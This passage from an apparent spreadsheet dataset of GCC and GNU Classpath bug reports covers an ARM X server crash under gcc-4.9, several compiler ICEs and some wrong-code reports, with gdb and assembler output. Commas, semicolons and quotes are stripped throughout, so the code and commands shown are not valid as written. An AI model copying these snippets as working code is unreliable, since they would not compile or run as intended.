@@ -1368 +14817 @@
         n = list-&gt;len
         while (n--) {
            const void *g
-
+            my_printf(glyphs = %p - 1\n glyphs)
+#if 1
+            /* case A: original crashing version */
             glyph = *glyphs++
+#else
+            /* case B: call something in between no crashing version */
+            glyph = *glyphs
+            my_printf(glyphs = %p - 2\n glyphs)
+            glyphs++
+#endif
+            my_printf(glyphs = %p - 3\n glyphs)
            if (!(g = pixman_glyph_cache_lookup (glyphCache glyph NULL))) {
        (host)$ host/usr/bin/arm-buildroot-linux-gnueabi-gdb  target/usr/bin/X
GNU gdb (GDB) 7.5.1
Copyright (C) 2012 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as --host=x86_64-unknown-linux-gnu --target=arm-buildroot-linux-gnueabi.
For bug reporting instructions please see:
...
Reading symbols from /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target/usr/bin/X...done.
(gdb) set sysroot /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target
(gdb) target remote 172.16.0.2:2500
Remote debugging using 172.16.0.2:2500
Reading symbols from /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target/lib/ld-linux.so.3...done.
Loaded symbols for /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target/lib/ld-linux.so.3
0xb6fd8af0 in _start () from /home/seiderer/Work/RaspberryPi/build_gcc_4_9/target/lib/ld-linux.so.3
(gdb) cont
Continuing.
Program received signal SIGSEGV Segmentation fault.
fbGlyphs (op= pSrc=0x1 pDst=0x4 maskFormat=0x3b9d90 xSrc=0 ySrc=0 nlist=-1 list=0xbefff490 glyphs=0x1)
    at fbpict.c:154
154                 glyph = *glyphs++
(gdb) p glyphs
$1 = (GlyphPtr *) 0x1
(gdb) info reg
r0             0x0      0
r1             0x0      0
r2             0x1      1
r3             0x1      1
r4             0xbefff49c       3204445340
r5             0x4      4
r6             0xbeffdba0       3204438944
r7             0x1      1
r8             0x0      0
r9             0x20     32
r10            0x3      3
r11            0x14     20
r12            0x0      0
sp             0xbeffdb08       0xbeffdb08
lr             0xb6b9cfc4       -1229336636
pc             0xb6b9cfc4       0xb6b9cfc4 
cpsr           0x60000010       1610612752
        (rpi)$ cat my.log
fbGlyphs() pSrc = 0x3b9d90 pDst = 0x3b9d00 glyphs = 0xbefff790
glyphs = 0xbefff790 - 1
===&gt;&gt; only first my_printf is reached printed glyphs pointer seems o.k. but is different from
the one shown in gdb...
Next try more debugging (in between the assignement and the increment) this time no xserver crash:
        (rpi)$ # head -20 my.log
fbGlyphs() pSrc = 0x1171d90 pDst = 0x1171d00 glyphs = 0xbeae67a0
glyphs = 0xbeae67a0 - 1
glyphs = 0xbeae67a0 - 2
glyphs = 0xbeae67a4 - 3
glyphs = 0xbeae67a4 - 1
glyphs = 0xbeae67a4 - 2
glyphs = 0xbeae67a8 - 3
glyphs = 0xbeae67a8 - 1
glyphs = 0xbeae67a8 - 2
glyphs = 0xbeae67ac - 3
glyphs = 0xbeae67ac - 1
glyphs = 0xbeae67ac - 2
glyphs = 0xbeae67b0 - 3
fbGlyphs() pSrc = 0x1171d90 pDst = 0x1171d00 glyphs = 0xbeae67a0
glyphs = 0xbeae67a0 - 1
glyphs = 0xbeae67a0 - 2
glyphs = 0xbeae67a4 - 3
fbGlyphs() pSrc = 0x1171d90 pDst = 0x1171d00 glyphs = 0xbeae67a0
glyphs = 0xbeae67a0 - 1
glyphs = 0xbeae67a0 - 2
Assambler output for fbpict.c compiled for case A (crash) and case B (no crash):
        (host)$ diff -u fbpict_case_A.s fbpict_case_B.s
--- fbpict_case_A.s     2014-06-07 23:18:37.454249170 +0200
+++ fbpict_case_B.s     2014-06-07 23:17:49.425274229 +0200
@@ -115647 +115665 @@
        ldr     r0 [sp #108]
        bl      my_printf(PLT)
 .LVL128:
-       .loc 1 154 0
-       ldr     r3 [r2]
-       add     r2 sp #6336
-       ldr     r7 [r3] #4
-       add     r2 r2 #16
-       .loc 1 161 0
+       .loc 1 157 0
+       add     r3 sp #6336
+       add     r3 r3 #16
+       ldr     r3 [r3]
+       .loc 1 158 0
        ldr     r0 .L159+16
-       .loc 1 154 0
-       str     r3 [r2]
+       .loc 1 157 0
+       ldr     r7 [r3]
 .LVL129:
-       .loc 1 161 0
-       ldr     r1 [r2]
+       .loc 1 158 0
+       add     r3 sp #6336
+       add     r3 r3 #16
+       ldr     r1 [r3]
 .LPIC42:
        add     r0 pc r0
        bl      my_printf(PLT)
 .LVL130:
+       .loc 1 159 0
+       add     r3 sp #6336
+       add     r3 r3 #16
+       ldr     r2 [r3]
+       .loc 1 161 0
+       ldr     r0 .L159+20
+       .loc 1 159 0
+       add     r2 r2 #4
+       .loc 1 161 0
+       mov     r1 r2
+.LPIC43:
+       add     r0 pc r0
+       .loc 1 159 0
+       str     r2 [r3]
+       .loc 1 161 0
+       bl      my_printf(PLT)
+.LVL131:
        .loc 1 163 0
-       ldr     r3 .L159+20
+       ldr     r3 .L159+24
        mov     r1 r7
-.LPIC43:
+.LPIC44:
        add     r3 pc r3
        ldr     r0 [r3]
        mov     r2 #0
        str     r3 [sp #84]
        bl      pixman_glyph_cache_lookup(PLT)
-.LVL131:
+.LVL132:
        subs    r9 r0 #0
        bne     .L129
 .LBB51:
        .loc 1 168 0
        mov     r0 r7
-.LVL132:
+.LVL133:
        ldr     r1 [sp #92]
        bl      GetGlyphPicture(PLT)
-.LVL133:
+.LVL134:
[...]
No crash when building with gcc-4.8 or when building with gcc-4.9 without optimization (-O0)...
Crash reproducible with buildroot-2014.08 (gcc-4.9.1 and gcc-4.9-20140917)...
Regards
Peter
Original buildroot bug report:
http://lists.busybox.net/pipermail/buildroot/2014-June/098679.html
Confirmed (with another test and toolchain) by Thomas Petazzoni:
http://lists.busybox.net/pipermail/buildroot/2014-July/101293.html</t>
  </si>
  <si>
    <t>ps.report</t>
  </si>
  <si>
    <t>GCC-27117</t>
  </si>
  <si>
    <t>SH backend cheats to reload -- disables indexed addressing but uses it internally</t>
  </si>
  <si>
    <t>The cross build for sh64-elf on x86 hosts fails during compilation
of libiberty/ramdom.c for 32bit SHmedia with
libiberty/random.c:362: internal compiler error: in push_reload at reload.c:1265
The following is a reduced testcase.  It ICEs with -O1 -m5-32media
on sh64-elf.
extern int tbl[32]
int n = 32
int
foo (int idx)
{
  return tbl[idx % n]
}
Binary search shows that it starts to fail after the patch
r112637 | bonzini | 2006-04-03 20:20:07 +0900 (Mon 03 Apr 2006) | 25 lines</t>
  </si>
  <si>
    <t>GCC-39482</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in inline_secondary_memory_needed at config/i386/i386.c:25478</t>
  </si>
  <si>
    <t>extern double log (double __x)
double foo(unsigned long int m_liOutputBufferLen)
{
  return log((double)m_liOutputBufferLen)
}
ICEs with -mno-sse2
./cc1 -quiet t.i -mno-sse2
t.i: In function 'foo':
t.i:5: internal compiler error: in inline_secondary_memory_needed at config/i386/i386.c:25478
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
while it is impossible to compile the call given ABI constraints we should
sorry() here not ICE.
GCC 4.2 and before simply ignored -mno-sse2 it seems.</t>
  </si>
  <si>
    <t>GCC-6764</t>
  </si>
  <si>
    <t>Throwing exception causes crash with '-O2 -fomit-frame-pointer'</t>
  </si>
  <si>
    <t>Throwing exception in attached test example causes 
SIGABRT if example is compiled with options '-O2 -fomit-frame-pointer'. There is no crash if example is compiled
without option -fomit-frame-pointer.
It's not a regression as gcc-2.95.3 have the same problem
Release:
gcc-3.1 release
Environment:
targets i686-pc-linux-gnu and i586-pc-msdosdjgpp
How-To-Repeat:
Compile attached example and run it:
  g++ -O2 -fomit-frame-pointer except.cc -o except
  ./except</t>
  </si>
  <si>
    <t>andris.pavenis</t>
  </si>
  <si>
    <t>GCC-44813</t>
  </si>
  <si>
    <t>[4.6 Regression] ipa-split causes ice in ptr_deref_may_alias_decl_p at tree-ssa-alias.c:173</t>
  </si>
  <si>
    <t>cc1plus -fpreprocessed nsTextFrameThebes.ii -dumpbase nsTextFrameThebes.cpp -mtune=generic -march=x86-64 -auxbase-strip nsTextFrameThebes.o -O2 -Os -Wall -Wpointer-arith -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wcast-align -Wno-invalid-offsetof -Wno-variadic-macros -Werror=return-type -pedantic -Wno-long-long -version -fPIC -fno-rtti -fno-exceptions -fpermissive -fuse-linker-plugin -fno-strict-aliasing -fshort-wchar -freorder-blocks -fomit-frame-pointer -o nsTextFrameThebes.s</t>
  </si>
  <si>
    <t>GCC-14960</t>
  </si>
  <si>
    <t>[3.4 only] -maltivec affects vector return with -mabi=no-altivec</t>
  </si>
  <si>
    <t>The -maltivec instruction should enable the use of the AltiVec
instruction set without affecting how function values are returned.
The documentation in invoke.texi says for -maltivec you may also
need to set -mabi=altivec to adjust the current ABI with Altivec
ABI enhancements but that doesn't appear to be required two modules
that are both compiled with either -mabi=altivec or -mabi=no-altivec
should be intercallable even if they pass vector arguments or have
vector return values.  Vector function return values are passed
differently though depending on whether -maltivec is specified
instead of which ABI is specified.
This test case fails when either of the two files is compiled with
-maltivec and the other is compiled without it and both are compiled
with -mabi=no-altivec.  This is for either -m32 or -m64 for
powerpc64-linux with current GCC 3.4 branch.  I'll try other branches
soon and report what I find.
--- bug.c --------------------------------------------------------------
/* Call a function whose return value is a vector.  Define the data that
   the function will use as input and verify that it returned the
   correct values.  */
extern __attribute__((vector_size(16))) int foo (void)
__attribute__((vector_size(16))) int i = { 100 200 300 400 }
__attribute__((vector_size(16))) int j = { 10 20 30 40 }
__attribute__((vector_size(16))) int k
extern void abort (void)
extern __attribute__((vector_size(16))) int foo (void)
void
check ()
{
    union {
        __attribute__((vector_size(16))) int v
        int i[4]
    } u
    u.v = k
    if (u.i[0] != 110 || u.i[1] != 220 || u.i[2] != 330 || u.i[3] != 440)
        abort ()
}
int
main ()
{
    k = foo ()
    check ()
    return 0
}
--- buga.c -------------------------------------------------------------
/* Return a vector.  */
extern __attribute__((vector_size(16))) int i j
__attribute__((vector_size(16))) int
foo (void)
{
    return i + j
}
------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>janis187</t>
  </si>
  <si>
    <t>CLASSPATH-22670</t>
  </si>
  <si>
    <t>Should Thread.stop() call ThreadGroup.removeThread().?</t>
  </si>
  <si>
    <t xml:space="preserve">Near the end of Thread.stop() it calls:
  group.removeThread(this)
Since the VM is going to do this anyway when the
thread exits this seems at best redundant.
Moreover in the pathological case where the thread
actually catches ThreadDeath and then keeps doing
stuff this is not just redundant but also wrong
because the thread hasn't died yet but it won't be
in its ThreadGroup anymore.
So this line should be removed.
</t>
  </si>
  <si>
    <t>GCC-37585</t>
  </si>
  <si>
    <t>[4.4 regression] undefined references at -O for ACATS c650001</t>
  </si>
  <si>
    <t>On trunk at Thu Sep 18 22:45:12 UTC 2008 (revision 140476)
$ gnatchop ../trunk/gcc/testsuite/ada/acats/support/rep*
$ gnatchop ../trunk/gcc/testsuite/ada/acats/tests/c6/c650001.a 
$ gnatmake -gnat95 -f -O1 c650001.adb
...
gnatlink c650001.ali
./c650001.o: In function `_ada_c650001':
c650001.adb:(.text+0x83d): undefined reference to `c650001_0__Ttask_arrayBIP__L27s__F24s.3033'
c650001.adb:(.text+0x96d): undefined reference to `c650001_0__Ttask_arrayBIP___clean.3019'
c650001.adb:(.text+0x97f): undefined reference to `c650001_0__Ttask_arrayBIP___clean.3019'
At -O0 the test links and PASS.
The test PASSed normally at:
LAST_UPDATED: Wed Sep 17 10:26:14 UTC 2008 (revision 140411)
http://gcc.gnu.org/ml/gcc-testresults/2008-09/msg01465.html</t>
  </si>
  <si>
    <t>GCC-50001</t>
  </si>
  <si>
    <t>[alpha]: ICE in reload_combine_note_use at postreload.c:1538</t>
  </si>
  <si>
    <t>Created attachment 24930
Profiler file
Currently g++.dg/tree-prof/partition1.C ICEs during -fprofile-use compile using attached gcda file:
FAIL: g++.dg/tree-prof/partition1.C compilation  -g  -fprofile-use (internal compiler error)
UNRESOLVED: g++.dg/tree-prof/partition1.C execution    -g  -fprofile-use
FAIL: g++.dg/tree-prof/partition1.C compilation  -O0  -fprofile-use (internal compiler error)
UNRESOLVED: g++.dg/tree-prof/partition1.C execution    -O0  -fprofile-use
FAIL: g++.dg/tree-prof/partition1.C compilation  -O1  -fprofile-use (internal compiler error)
UNRESOLVED: g++.dg/tree-prof/partition1.C execution    -O1  -fprofile-use
FAIL: g++.dg/tree-prof/partition1.C compilation  -O2  -fprofile-use (internal compiler error)
UNRESOLVED: g++.dg/tree-prof/partition1.C execution    -O2  -fprofile-use
FAIL: g++.dg/tree-prof/partition1.C compilation  -O3  -fprofile-use (internal compiler error)
UNRESOLVED: g++.dg/tree-prof/partition1.C execution    -O3  -fprofile-use
FAIL: g++.dg/tree-prof/partition1.C compilation  -O3 -g  -fprofile-use (internal compiler error)
UNRESOLVED: g++.dg/tree-prof/partition1.C execution    -O3 -g  -fprofile-use
FAIL: g++.dg/tree-prof/partition1.C compilation  -Os  -fprofile-use (internal compiler error)
UNRESOLVED: g++.dg/tree-prof/partition1.C execution    -Os  -fprofile-use
~/gcc-build-alpha/gcc/cc1plus -O2 -freorder-blocks-and-partition -fprofile-use -w -quiet partition1.C
partition1.C: In function â€˜void foo()â€™:
partition1.C:46:1: internal compiler error: in reload_combine_note_use at postreload.c:1538
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) up
#1  0x000000000092a808 in reload_combine_note_use (xp= 
    insn=0x7ffff1a197e0 ruid=3 containing_mem=)
    at ../../gcc-svn/trunk/gcc/postreload.c:1538
1538		gcc_assert (regno &lt; FIRST_PSEUDO_REGISTER)
(gdb) bt
#0  fancy_abort (file=0xdb5b58 ../../gcc-svn/trunk/gcc/postreload.c 
    line=1538 function=0xdb6050 reload_combine_note_use)
    at ../../gcc-svn/trunk/gcc/diagnostic.c:892
#1  0x000000000092a808 in reload_combine_note_use (xp= 
    insn=0x7ffff1a197e0 ruid=3 containing_mem=)
    at ../../gcc-svn/trunk/gcc/postreload.c:1538
#2  0x000000000092a5e7 in reload_combine_note_use (xp= 
    insn=0x7ffff1a197e0 ruid=3 containing_mem=0x7ffff1a17288)
    at ../../gcc-svn/trunk/gcc/postreload.c:1600
#3  0x000000000092a5a5 in reload_combine_note_use (xp= 
    insn=0x7ffff1a197e0 ruid=3 containing_mem=0x0)
    at ../../gcc-svn/trunk/gcc/postreload.c:1604
#4  0x000000000092bb3f in reload_combine ()
    at ../../gcc-svn/trunk/gcc/postreload.c:1384
#5  0x000000000092ca1e in reload_cse_regs (first=0x7ffff19e06c0)
    at ../../gcc-svn/trunk/gcc/postreload.c:72
The problem can be triggered with a c++ crosscompiler to --target=alphaev68-pc-linux-gnu.</t>
  </si>
  <si>
    <t>CLASSPATH-25517</t>
  </si>
  <si>
    <t>JFormattedTextField doesn't fire ActionEvent when VK_ENTER is hit</t>
  </si>
  <si>
    <t>JFormattedTextField should fire an ActionEvent on VK_ENTER when its value is valid . It currently doesn't event fire an ActionEvent under any conditions.</t>
  </si>
  <si>
    <t>ctl</t>
  </si>
  <si>
    <t>GCC-22140</t>
  </si>
  <si>
    <t>[4.1 Regression] ACATS ICE c37213j c37213l do_structure_copy at tree-ssa-structalias.c:2372</t>
  </si>
  <si>
    <t>+===========================GNAT BUG DETECTED==============================+
| 4.1.0 20050621 (experimental) (x86_64-unknown-linux-gnu) GCC error:      |
| tree check: expected integer_cst have cond_expr in                      |
|    do_structure_copy at tree-ssa-structalias.c:2372                     |
| Error detected at c37213j.adb:320:5                                      |
+===========================GNAT BUG DETECTED==============================+
| 4.1.0 20050621 (experimental) (x86_64-unknown-linux-gnu) GCC error:      |
| tree check: expected integer_cst have cond_expr in                      |
|    do_structure_copy at tree-ssa-structalias.c:2372                     |
| Error detected at c37213l.adb:329:5                                      |</t>
  </si>
  <si>
    <t>GCC-62103</t>
  </si>
  <si>
    <t>Incorrect folding of bitfield in a union on big endian targets</t>
  </si>
  <si>
    <t>Folding of bitfield in a union is incorrect on big endian targets. Consider the testcase given in attachment u.b would be folded to 0x45678 instead of 0x12345.</t>
  </si>
  <si>
    <t>thomas.preudhomme</t>
  </si>
  <si>
    <t>GCC-14756</t>
  </si>
  <si>
    <t>[unit-at-a-time] [tree-ssa regression] Linux kernel compilation failed</t>
  </si>
  <si>
    <t>Compiling kernel 2.6.5-rc2 with make defconfig make fails in kernel/sched.c with the 
following message: 
kernel/sched.c: In function `schedule': 
include/asm/thread_info.h:84: sorry unimplemented: inlining failed in call to 
'current_thread_info': function not considered for inlining 
kernel/sched.c:854: sorry unimplemented: called from here 
include/asm/thread_info.h:84: sorry unimplemented: inlining failed in call to 
'current_thread_info': function not considered for inlining 
kernel/sched.c:872: sorry unimplemented: called from here 
GCC version is 3.5-tree-ssa 20040327 (merged 20040324) bootstrapped with  
configure --disable-checking --enable-languages=c and  
CFLAGS=-g -O2 -march-pentium3. 
To reproduce: 
cc1 -fpreprocessed sched.i -quiet -funit-at-a-time -o sched.s 
(It will exit with status 1.)</t>
  </si>
  <si>
    <t>GCC-19738</t>
  </si>
  <si>
    <t>gcjh generates invalid class member floating-point initialisers</t>
  </si>
  <si>
    <t>For floating-point (float/double) class
members that are initialised gcjh generates invalid
C++ code.
See:
  http://gcc.gnu.org/ml/gcc/2005-01/msg01738.html
for the issue in general and:
  http://gcc.gnu.org/ml/gcc-patches/2005-02/msg00032.html
for how it affects GCJ.</t>
  </si>
  <si>
    <t>GCC-64078</t>
  </si>
  <si>
    <t>FAIL: c-c++-common/ubsan/object-size-9.c</t>
  </si>
  <si>
    <t>On Linux/x86-64 I got
FAIL: c-c++-common/ubsan/object-size-9.c   -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  output pattern test is c-c++-common/ubsan/object-size-9.c:21:11: runtime error: load of address 0x7fffbe9defec with insufficient space for an object of type 'char'
at random.</t>
  </si>
  <si>
    <t>GCC-60283</t>
  </si>
  <si>
    <t>Wrong code: decode_omp_directive: implicit_pure not correctly unset</t>
  </si>
  <si>
    <t>decode_omp_directive (void) {
...
  if (gfc_implicit_pure (NULL))
    gfc_current_ns-&gt;proc_name-&gt;attr.implicit_pure = 0
That code probably fails if one has BLOCK which starts a new namespace.
Cf. discussion for OpenACC at http://gcc.gnu.org/ml/gcc-patches/2014-02/msg01194.html
Patch r168600 of 2011-01-08 added this assignment and possibly others I wonder whether those also have problems with BLOCKS.</t>
  </si>
  <si>
    <t>GCC-7542</t>
  </si>
  <si>
    <t>compiling for powerpc Altivec</t>
  </si>
  <si>
    <t>I tried to compile Altivec code - and used vec_msum(__vector signed char c1 __vector unsigned char c2 __vector signed int i1) ... 
the compiler change this to the assembler code vmsumubm - which uses 2 UNsigned char vectors instead of vmsummbm which uses one SIGNES and one UNSIGND !!
this bug causes the signed operand to be treated as unsigned !!
Release:
gcc-3.1
Environment:
linux  powerpc
How-To-Repeat:
the following compilation:
g++ -S -Wall -pedantic -ansi -Wno-long-long -DNDEBUG -O6 -DALTIVEC -maltivec testZevel.cpp
the g++ version is :
Reading specs from /opt/gcc-3.1/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc-3.1/configure --prefix=/opt/gcc-3.1 --enable-shared --enable-threads --enable-languages=cc++
Thread model: posix
gcc version 3.1</t>
  </si>
  <si>
    <t>eyal</t>
  </si>
  <si>
    <t>GCC-70809</t>
  </si>
  <si>
    <t>[AArch64] aarch64_vmls pattern should be rejected if -ffp-contract=off</t>
  </si>
  <si>
    <t>Take this simple testcase:
  void
  foo (float * __restrict__ __attribute__ ((aligned (16))) a
       float * __restrict__ __attribute__ ((aligned (16))) x
       float * __restrict__ __attribute__ ((aligned (16))) y
       float * __restrict__ __attribute__ ((aligned (16))) z)
  {
    unsigned i = 0
    for (i = 0 i &lt; 256 i++)
      a[i] = x[i] - (y[i] * z[i])
  }
GCC for AArch64 (all versions) will generate a vectorized fmls instruction even when given the --fp-contract=off command (for trunk and 6 you'll need to play with -mcpu options to find one which permits the combine through the cost model):
(for trunk) $ gcc -O3 -ffp-contract=off -mcpu=xgene1 foo.c
   .L4:
	ldr	q2 [x9 x4]
	add	w5 w5 1
	ldr	q1 [x8 x4]
	cmp	w5 w7
	ldr	q0 [x10 x4]
	fmls	v0.4s v2.4s v1.4s
	str	q0 [x6 x4]
	add	x4 x4 16
	bcc	.L4
The problem seems pretty clear the aarch64_vmls pattern needs to be tightened up not to fuse multiplies and subtracts when we're not in -ffp-contract=fast.
  (define_insn aarch64_vmls
    [(set (match_operand:VDQF 0 register_operand =w)
         (minus:VDQF (match_operand:VDQF 1 register_operand 0)
		     (mult:VDQF (match_operand:VDQF 2 register_operand w)
			        (match_operand:VDQF 3 register_operand w))))]
    TARGET_SIMD
   fmls\\t%0. %2. %3.
    [(set_attr type neon_fp_mla__scalar)]
  )</t>
  </si>
  <si>
    <t>jgreenhalgh</t>
  </si>
  <si>
    <t>GCC-78478</t>
  </si>
  <si>
    <t>Compile Error for i386-rtems</t>
  </si>
  <si>
    <t>This is on the git master (13d9a9837159ecd162d08fbbe2ef655aebb7a4c9) as of yesterday.
This appears to be an issue with soft-float.
/home/joel/test-gcc/b-i386-rtems4.12-gcc/./gcc/xgcc -B/home/joel/test-gcc/b-i386-rtems4.12-gcc/./gcc/ -nostdinc -B/home/joel/test-gcc/b-i386-rtems4.12-gcc/i386-rtems4.12/newlib/ -isystem /home/joel/test-gcc/b-i386-rtems4.12-gcc/i386-rtems4.12/newlib/targ-include -isystem /home/joel/test-gcc/gcc/newlib/libc/include -B/home/joel/test-gcc/install-master/i386-rtems4.12/bin/ -B/home/joel/test-gcc/install-master/i386-rtems4.12/lib/ -isystem /home/joel/test-gcc/install-master/i386-rtems4.12/include -isystem /home/joel/test-gcc/install-master/i386-rtems4.12/sys-include    -g -O2 -msoft-float -O2 -I../../../../gcc/libgcc/../newlib/libc/sys/rtems/include -g -O2 -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector -Dinhibit_libc  -I. -I. -I../../.././gcc -I../../../../gcc/libgcc -I../../../../gcc/libgcc/. -I../../../../gcc/libgcc/../gcc -I../../../../gcc/libgcc/../include  -DHAVE_CC_TLS  -Wno-missing-prototypes -Wno-type-limits -o trunctfdf2.o -MT trunctfdf2.o -MD -MP -MF trunctfdf2.dep  -c ../../../../gcc/libgcc/soft-fp/trunctfdf2.c -fvisibility=hidden -DHIDE_EXPORTS
/home/joel/test-gcc/b-i386-rtems4.12-gcc/./gcc/xgcc -B/home/joel/test-gcc/b-i386-rtems4.12-gcc/./gcc/ -nostdinc -B/home/joel/test-gcc/b-i386-rtems4.12-gcc/i386-rtems4.12/newlib/ -isystem /home/joel/test-gcc/b-i386-rtems4.12-gcc/i386-rtems4.12/newlib/targ-include -isystem /home/joel/test-gcc/gcc/newlib/libc/include -B/home/joel/test-gcc/install-master/i386-rtems4.12/bin/ -B/home/joel/test-gcc/install-master/i386-rtems4.12/lib/ -isystem /home/joel/test-gcc/install-master/i386-rtems4.12/include -isystem /home/joel/test-gcc/install-master/i386-rtems4.12/sys-include    -g -O2 -msoft-float -O2 -I../../../../gcc/libgcc/../newlib/libc/sys/rtems/include -g -O2 -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector -Dinhibit_libc  -I. -I. -I../../.././gcc -I../../../../gcc/libgcc -I../../../../gcc/libgcc/. -I../../../../gcc/libgcc/../gcc -I../../../../gcc/libgcc/../include  -DHAVE_CC_TLS  -Wno-missing-prototypes -Wno-type-limits -o trunctfxf2.o -MT trunctfxf2.o -MD -MP -MF trunctfxf2.dep  -c ../../../../gcc/libgcc/soft-fp/trunctfxf2.c -fvisibility=hidden -DHIDE_EXPORTS
In file included from ../../../../gcc/libgcc/soft-fp/extendxftf2.c:31:0:
../../../../gcc/libgcc/soft-fp/extended.h:69:1: error: unable to emulate 'XF'
 typedef float XFtype __attribute__ ((mode (XF)))</t>
  </si>
  <si>
    <t>GCC-77717</t>
  </si>
  <si>
    <t>testsuite/21_strings/basic_string_view/operations/compare/char/1.cc makes undefined memcmp call</t>
  </si>
  <si>
    <t>This test case makes an undefined call to memcmp because the string constant is shorter than the length given. costa rica is 11 bytes including the '\0' but length of 14 is given. The last two lines of code quoted below both do it.
int
test01()
{
  using std::string_view
  string_view   str_0(costa rica)
  string_view   str_1(costa marbella)
  string_view   str_2
  //sanity check
  test_value(strcmp(costa marbella costa rica) lt)
  test_value(strcmp(costa rica costa rica) z)
  test_value(strcmp(str_1.data() str_0.data()) lt)
  test_value(strcmp(str_0.data() str_1.data()) gt)
  test_value(strncmp(str_1.data() str_0.data() 6) z)
  test_value(strncmp(str_1.data() str_0.data() 14) lt)
  test_value(memcmp(str_1.data() str_0.data() 6) z)
  test_value(memcmp(str_1.data() str_0.data() 14) lt)
  test_value(memcmp(costa marbella costa rica 14) lt)</t>
  </si>
  <si>
    <t>ville.voutilainen</t>
  </si>
  <si>
    <t>acsawdey</t>
  </si>
  <si>
    <t>GCC-69708</t>
  </si>
  <si>
    <t>ipa inline not working for function reference in static const struct</t>
  </si>
  <si>
    <t>Please see full discussion at https://gcc.gnu.org/ml/gcc/2016-02/msg00042.html.
Here is a summary of the above:
```
typedef struct F {
  int (*call)(int)
} F
static int g(F f int x) {
  x = f.call(x)
  x = f.call(x)
  x = f.call(x)
  x = f.call(x)
  x = f.call(x)
  x = f.call(x)
  x = f.call(x)
  x = f.call(x)
  return x
}
static int sq(int x) {
  return x * x
}
static const F f = {sq}
void dosomething(int)
int h(int x) {
  dosomething(g(f x))
  dosomething(g((F){sq} x))
}
```
I've reported this: .
Just to summarize:
1) If early inlining is forced then fre replaces the many references to sq and ipa inlining is able to do its job.
2) If early inlining is disabled then ipa inlining only works for the compound literal case. The cp pass (happening immediately before the ipa inline one) results in:
```
h (int x)
{
  ...
  _4 = g (f x_2(D))
  dosomething (_4)
  D.1847.call = sq
  _8 = g (D.1847 x_2(D))
  dosomething (_8)
  ....
}
```
Nevertheless ipa inline seems clever enough to expand the second call to g.
3) The proper solution seems to be that cp were able to propagate sq to both call sites in order to make things easy to ipa inline.</t>
  </si>
  <si>
    <t>carlosjosepita</t>
  </si>
  <si>
    <t>GCC-10165</t>
  </si>
  <si>
    <t>[3.2.2] insn - jsdtoa.c from mozilla with -O2 -march=pentium4</t>
  </si>
  <si>
    <t>/usr/src/mozilla/js/src # gcc -O2 -march=pentium4 jsdtoa.i
jsdtoa.c: In function `JS_strtod':
jsdtoa.c:1874: unable to find a register to spill in class `AREG'
jsdtoa.c:1874: this is the insn:
(insn:QI 1978 1977 1979 (set (reg:CCNO 17 flags)
        (compare:CCNO (and:SI (subreg:SI (reg/v:DI 21 rxmm0 [278]) 0)
                (const_int 1 [0x1]))
            (const_int 0 [0x0]))) 281 {testsi_1} (insn_list 1974 (nil))
    (expr_list:REG_DEAD (reg/v:DI 21 rxmm0 [278])
        (nil)))
jsdtoa.c:1874: confused by earlier errors bailing out
Release:
unknown
Environment:
lunar-linux glibc 2.3.2 (source distro)
How-To-Repeat:
gcc -O2 -march=pentium4 jsdtoa.i</t>
  </si>
  <si>
    <t>auke.kok</t>
  </si>
  <si>
    <t>GCC-56481</t>
  </si>
  <si>
    <t>[4.8 Regression] endless loop compiling a C++ file</t>
  </si>
  <si>
    <t>Created attachment 29549
preprocessed source
seen with 4.8.0 20130223 (experimental) [trunk revision 196236]
seen as well with -g -fopenmp -O
$ g++ -c GuiFilesModified.ii
0  0x00000000005e2a3e in ?? ()
#1  0x00000000005e2f5d in ?? ()
#2  0x00000000005e357f in ?? ()
#3  0x00000000005e2b22 in ?? ()
#4  0x00000000005e4ca7 in ?? ()
#5  0x00000000005e5a4a in ?? ()
#6  0x00000000005e4f2a in maybe_constant_value(tree_node*) ()
#7  0x00000000005e5a4a in ?? ()
#8  0x00000000005e4f2a in maybe_constant_value(tree_node*) ()
#9  0x00000000005e5a4a in ?? ()
#10 0x00000000005e5481 in ?? ()
#11 0x00000000005e4f2a in maybe_constant_value(tree_node*) ()
#12 0x00000000005e5a4a in ?? ()
#13 0x00000000005e5481 in ?? ()
#14 0x00000000005e5481 in ?? ()
#15 0x00000000005e5481 in ?? ()
#16 0x00000000005e4f2a in maybe_constant_value(tree_node*) ()
#17 0x00000000005e5a4a in ?? ()
#18 0x00000000005e4f2a in maybe_constant_value(tree_node*) ()
#19 0x00000000005e5a4a in ?? ()
#20 0x00000000005e4f2a in maybe_constant_value(tree_node*) ()</t>
  </si>
  <si>
    <t>GCC-50292</t>
  </si>
  <si>
    <t>compiler bug box - pl-io.ads</t>
  </si>
  <si>
    <t>garynot</t>
  </si>
  <si>
    <t>GCC-37162</t>
  </si>
  <si>
    <t>[4.4 Regression] gcc.c-torture/compile/20020120-1.c fails with ICE on -O[23s]</t>
  </si>
  <si>
    <t>gcc.c-torture/compile/20020120-1.c fails with ICE on -O[23s] and gives segfault. It is known to fail on trunk revision 139231. Test is known successful on trunk revision 139194.</t>
  </si>
  <si>
    <t>eric.weddington</t>
  </si>
  <si>
    <t>GCC-66256</t>
  </si>
  <si>
    <t>noexcept evaluation done before end of class</t>
  </si>
  <si>
    <t>The following code does not compile (with -std=c++11):
